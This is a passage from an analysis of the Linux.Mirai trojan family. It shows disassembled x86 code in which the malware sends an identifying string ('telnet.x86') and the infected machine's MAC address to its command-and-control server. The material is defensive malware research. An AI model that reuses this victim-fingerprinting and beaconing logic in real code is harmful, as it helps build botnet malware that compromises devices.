Investigation of Linux.Mirai Trojan family




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19<br />

19<br />

.text:0804B674 push <strong>of</strong>fset a2 ; "telnet.x86"<br />

.text:0804B679 push ebx ; a1<br />

.text:0804B67A call strncpy<br />

.text:0804B67F mov eax, ds:fd<br />

.text:0804B684 push 4000h ; int<br />

.text:0804B689 push 20h ; int<br />

.text:0804B68B push ebx ; char *<br />

.text:0804B68C push eax ; int<br />

.text:0804B68D call ___libc_send<br />

The MAC address <strong>of</strong> a network card is also sent to the C&C server:<br />

.text:0804B756 push edx ; ifconf *<br />

.text:0804B757 push SIOCGIFFLAGS ; request<br />

.text:0804B75C push esi ; d<br />

.text:0804B75D call ___GI_ioctl<br />

.text:0804B762 add esp, 10h<br />

.text:0804B765 test eax, eax<br />

.text:0804B767 jnz short loc_804B735<br />

.text:0804B769 test byte ptr [esp+48Ch+a1.ifr_ifru], 8<br />

.text:0804B771 jnz short loc_804B735<br />

.text:0804B773 push eax ; char *<br />

.text:0804B774 lea eax, [esp+490h+a1]<br />

.text:0804B77B push eax ; ifconf *<br />

.text:0804B77C push SIOCGIFHWADDR ; request<br />

.text:0804B781 push esi ; d<br />

.text:0804B782 call ___GI_ioctl<br />

.text:0804B787 add esp, 10h<br />

.text:0804B78A test eax, eax<br />

.text:0804B78C jnz short loc_804B735<br />

.text:0804B78E push esi<br />

.text:0804B78F push 6 ; a3<br />

.text:0804B791 lea edx, [esp+494h+a1.ifr_ifru+2]<br />

.text:0804B798 push edx ; a2<br />

.text:0804B799 lea eax, [esp+498h+macAddr]<br />

.text:0804B7A0 push eax ; a1<br />

.text:0804B7A1 call strncpy<br />

.text:0804B7A6 add esp, 10h<br />

.text:0804B7A9 loc_804B7A9:<br />

; CODE XREF: main<br />

+381j...<br />

.text:0804B7A9 push 4000h ; int<br />

.text:0804B7AE push 6 ; int<br />

.text:0804B7B0 lea edx, [esp+494h+macAddr]<br />

.text:0804B7B7 mov ebx, ds:fd<br />

.text:0804B7BD push edx ; char *

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